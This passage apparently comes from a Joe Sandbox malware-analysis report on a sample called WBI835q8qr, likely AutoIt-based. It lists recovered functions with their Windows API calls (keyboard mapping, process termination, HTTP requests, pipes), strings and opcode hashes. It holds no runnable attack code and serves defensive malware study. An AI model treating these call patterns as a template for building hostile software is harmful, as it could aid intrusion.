ReleaseDC.USER32(00000000,00000000), ref: 00B7B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B7B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00B7B7FE

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 386118eefee90a8574b88b8496c46ae807735e6fbe2e3636a4476a33233ebed9
Instruction ID: b7a0eb9ecfe185c7b3beddfb5aac4115bc4e409ac3fa5312cfe3b6a4f8eaf6ec
Opcode Fuzzy Hash: 386118eefee90a8574b88b8496c46ae807735e6fbe2e3636a4476a33233ebed9
Instruction Fuzzy Hash: D9018875E00205BBEB105FE69C45F5EBFB8EB49311F004075FA08A7291DA709C00CF90

Function 00B40162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B40193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B4019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B401A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B401B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B401B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B401C1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 561ff590c01d2d86fb5c86ee89eb0f4dc8041ad60b4183dd2096fc845be428e8
Instruction ID: 2d691f62352fdf13205ad1f4154ad0e56cb4b7ff80a6d8c314e38b5f0342f87a
Opcode Fuzzy Hash: 561ff590c01d2d86fb5c86ee89eb0f4dc8041ad60b4183dd2096fc845be428e8
Instruction Fuzzy Hash: A6016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5

Function 00B853E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B853F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B8540F
GetWindowThreadProcessId.USER32(?,?), ref: 00B8541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B85437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B8543E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: d29b8d9b61c063a766deb6c6c110a58862c7e35b01ea0c2e7536481fb10ffa14
Instruction ID: 30b2b6bb35332f6c05bb2fb7f2abc1ea057162fec628707578482fabe221a7a2
Opcode Fuzzy Hash: d29b8d9b61c063a766deb6c6c110a58862c7e35b01ea0c2e7536481fb10ffa14
Instruction Fuzzy Hash: CAF01D32241559BBE7315BE6DC0EEFF7A7CEBC7B11F000169FA04D20619AA11A01C6B5

Function 00B87230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B87243
EnterCriticalSection.KERNEL32(?,?,00B30EE4,?,?), ref: 00B87254
TerminateThread.KERNEL32(00000000,000001F6,?,00B30EE4,?,?), ref: 00B87261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B30EE4,?,?), ref: 00B8726E

Part of subcall function 00B86C35: CloseHandle.KERNEL32(00000000,?,00B8727B,?,00B30EE4,?,?), ref: 00B86C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B87281
LeaveCriticalSection.KERNEL32(?,?,00B30EE4,?,?), ref: 00B87288

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 77c5420e4c587eb3797b80526c7f69574877a1f85670690ed54087734935b706
Instruction ID: 27d1856dd285177f99dc4e16319f5c7812521e2f10b764c2b47f6641897f8907
Opcode Fuzzy Hash: 77c5420e4c587eb3797b80526c7f69574877a1f85670690ed54087734935b706
Instruction Fuzzy Hash: ADF03A36544713ABDB622BA4ED4EAEA7769EF46702B100571F502A20B0DF769801CB50

Function 00B78992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B7899D
UnloadUserProfile.USERENV(?,?), ref: 00B789A9
CloseHandle.KERNEL32(?), ref: 00B789B2
CloseHandle.KERNEL32(?), ref: 00B789BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00B789C3
HeapFree.KERNEL32(00000000), ref: 00B789CA

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 1040c0341ea545c43d6178a857c4a7b32022c0ee957c999f8f8b0653d05936b2
Instruction ID: 37dc61d34cb807f6fa3ff200415af5bec69d6c8ce59506e76bc6e44cba8cb5de
Opcode Fuzzy Hash: 1040c0341ea545c43d6178a857c4a7b32022c0ee957c999f8f8b0653d05936b2
Instruction Fuzzy Hash: 53E05276104506FFDB011FE5EC0E9AABBA9FB8A762B508631F22992470CF329461DB54

Function 00B985ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B98613
CharUpperBuffW.USER32(?,?), ref: 00B98722
VariantClear.OLEAUT32(?), ref: 00B9889A

Part of subcall function 00B87562: VariantInit.OLEAUT32(00000000), ref: 00B875A2
Part of subcall function 00B87562: VariantCopy.OLEAUT32(00000000,?), ref: 00B875AB
Part of subcall function 00B87562: VariantClear.OLEAUT32(00000000), ref: 00B875B7

Strings

Incorrect Parameter format, xrefs: 00B9864B, 00B9880D
AUTOIT.ERROR, xrefs: 00B98728

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 788c6837fef22f48511e356c76806cb662ac17f0ed305afa8db708569c9e7c32
Instruction ID: 85f4cc6f64d4036667f23f688764ba617d4926327df6a026d37bf65948054c1b
Opcode Fuzzy Hash: 788c6837fef22f48511e356c76806cb662ac17f0ed305afa8db708569c9e7c32
Instruction Fuzzy Hash: E4918E716083019FCB10DF24C48495ABBE4EF8A754F1489AEF89A8B361DB31ED45CB92

Function 00B82A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3FC86: _wcscpy.LIBCMT ref: 00B3FCA9

_memset.LIBCMT ref: 00B82B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B82BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B82C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B82C97

Strings

0, xrefs: 00B82B73

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 1336aef8a29d15f894ca1f6c09d3caab4c82875c86d667eeaf97594046be77e0
Instruction ID: 861139e11f83a7d71765d7cfef3aceeb28485fd4ba621e148dddc4322a925386
Opcode Fuzzy Hash: 1336aef8a29d15f894ca1f6c09d3caab4c82875c86d667eeaf97594046be77e0
Instruction Fuzzy Hash: CB51AA716093019AD724AF28D885A7FB7E8EF99310F040AADF895D72A1DB70CD04DB92

Function 00B7D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B7D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B7D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B7D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B7D69D

Strings

DllGetClassObject, xrefs: 00B7D610

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 24c1f30533286a4df027d612b0fe4950f10436f40036d31979fa7091132a1676
Instruction ID: 9ba1469c644162c7947c6086f35da06cd22b0b1760004ce5e231b0e4a9984c64
Opcode Fuzzy Hash: 24c1f30533286a4df027d612b0fe4950f10436f40036d31979fa7091132a1676
Instruction Fuzzy Hash: E9413BB1600205EFDB15DF64C884AAABBF9EF44350B15C1E9A91D9F205DBB1D944CBA0

Function 00B82753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B827C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B827DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00B82822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BE5890,00000000), ref: 00B8286B

Strings

0, xrefs: 00B827B5

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: d40738ac5dc720f1fe693e12df5b4ca9d655ff9fafbbb884c92c7283a3de46e6
Instruction ID: b19b3c11902f9213c42f7ffc9951f1940433ed5632fbdbee24455882bc1029c4
Opcode Fuzzy Hash: d40738ac5dc720f1fe693e12df5b4ca9d655ff9fafbbb884c92c7283a3de46e6
Instruction Fuzzy Hash: 7A41A270604341AFDB24EF24CC85B6ABBE4EF85314F1449AEF965972A1DB30E905CB52

Function 00B9D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B9D7C5

Part of subcall function 00B2784B: _memmove.LIBCMT ref: 00B27899

Strings

none, xrefs: 00B9D8A0
cdecl, xrefs: 00B9D81C
winapi, xrefs: 00B9D836
stdcall, xrefs: 00B9D847

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 94f22aa5e53b61df1a932f31c9459fc480390d3c17ac10930ce876ee2352e2f6
Instruction ID: 0b9ded374e7d414de68f1991f576a23f0932540d56f85de4f86a97ce999a872e
Opcode Fuzzy Hash: 94f22aa5e53b61df1a932f31c9459fc480390d3c17ac10930ce876ee2352e2f6
Instruction Fuzzy Hash: 4231B271904615ABCF00EF55CC919FEB3F4FF15320B1086AAE829977D2DB31A905CB90

Function 00B78E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

Part of subcall function 00B7AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00B7AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B78F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B78F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B78F57

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

Strings

ListBox, xrefs: 00B78ED3
ComboBox, xrefs: 00B78E9E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 53e9b4dbfde6e0bab88d60f24134931f32fad15f1db98810b76865a68567ee70
Instruction ID: b8d080a600f163c6b45d7e9cd084209e6f4e5b27a3605382c911b7c4a268abbf
Opcode Fuzzy Hash: 53e9b4dbfde6e0bab88d60f24134931f32fad15f1db98810b76865a68567ee70
Instruction Fuzzy Hash: 662128719841047FDB14ABB4DC8ACFFB7E9DF05360B0485A9F429671E0DF354909D660

Function 00B9182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B91872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B918A2
InternetCloseHandle.WININET(00000000), ref: 00B918E9

Part of subcall function 00B92483: GetLastError.KERNEL32(?,?,00B91817,00000000,00000000,00000001), ref: 00B92498
Part of subcall function 00B92483: SetEvent.KERNEL32(?,?,00B91817,00000000,00000000,00000001), ref: 00B924AD

Strings

, xrefs: 00B91893

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: de5dedd338ea7f064562ec8edbec39ab806b8fe0ffde6ecfd486ce8264ef47f3
Instruction ID: 721c7019e63890edc3d5827311c679db8f382e04564f17c136e9c5ee650243a9
Opcode Fuzzy Hash: de5dedd338ea7f064562ec8edbec39ab806b8fe0ffde6ecfd486ce8264ef47f3
Instruction Fuzzy Hash: FF21BEB5600209BFEB119BA8DCC5EBF77EDEB49744F10457AF905A7240EA208D05B7B0

Function 00BA63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B21D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B21D73
Part of subcall function 00B21D35: GetStockObject.GDI32(00000011), ref: 00B21D87
Part of subcall function 00B21D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B21D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BA6461
LoadLibraryW.KERNEL32(?), ref: 00BA6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BA647D
DestroyWindow.USER32(?), ref: 00BA6485

Strings

SysAnimate32, xrefs: 00BA643C

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: e246b5ea62826eb4f2afb15ff58a416f6e80c57ce2a7faa7df072049d5b589be
Instruction ID: bb211da97705a51030c7fd0736bba04e9821fa7a099946ad70d9648d4155b105
Opcode Fuzzy Hash: e246b5ea62826eb4f2afb15ff58a416f6e80c57ce2a7faa7df072049d5b589be
Instruction Fuzzy Hash: 5C21BBB1204205BBEF104FA8DC81EBA37E9EB5A328F184669FA1097290DB319C41A760

Function 00B86D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B86DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B86DEF
GetStdHandle.KERNEL32(0000000C), ref: 00B86E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B86E3B

Strings

nul, xrefs: 00B86E36

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: db5916863582b27d777a0bca6d0565d84e311e143423f6eef3e9fbd440332e9f
Instruction ID: c6c834be2029fd89e2249532d63ff76b061d012ebc29ecc663fb738484788ab3
Opcode Fuzzy Hash: db5916863582b27d777a0bca6d0565d84e311e143423f6eef3e9fbd440332e9f
Instruction Fuzzy Hash: C521A47460030AABDB20AF69DC45B9A7BF4EF45721F2046A9FCA1D72E0EB709950CB50

Function 00B86E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B86E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B86EBB
GetStdHandle.KERNEL32(000000F6), ref: 00B86ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B86F06

Strings

nul, xrefs: 00B86F01

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: cf8e450f92424f6f05bb091eae89dc71d84e2d40aa673bc4b87fb3e363b48667
Instruction ID: 6355b5fc997bc747f5643397049956b077ab0eafea9fc425b4a956c58bf26e5d
Opcode Fuzzy Hash: cf8e450f92424f6f05bb091eae89dc71d84e2d40aa673bc4b87fb3e363b48667
Instruction Fuzzy Hash: B021C8755003069BDB20AF69DC45AAA77E8EF55731F200A99FDE1D72E0DB709850CB50

Function 00B8AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B8AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B8ACA8
__swprintf.LIBCMT ref: 00B8ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00BAF910), ref: 00B8ACFF

Strings

%lu, xrefs: 00B8ACBB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: ac7a52bd54ab3138decdf4369b7c79357c28499ef59f8deaf94219d3a8433ae2
Instruction ID: 0efae7727f4897d18a01fce793f9137693bf7fdb77906245ab3a5e6e6038a4af
Opcode Fuzzy Hash: ac7a52bd54ab3138decdf4369b7c79357c28499ef59f8deaf94219d3a8433ae2
Instruction Fuzzy Hash: E5217430600109AFCB10EF55DD45EEE77F8EF49714B0040A9F909AB261DA71EA41CB61

Function 00B81AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B81B19

Strings

KEYS, xrefs: 00B81B30
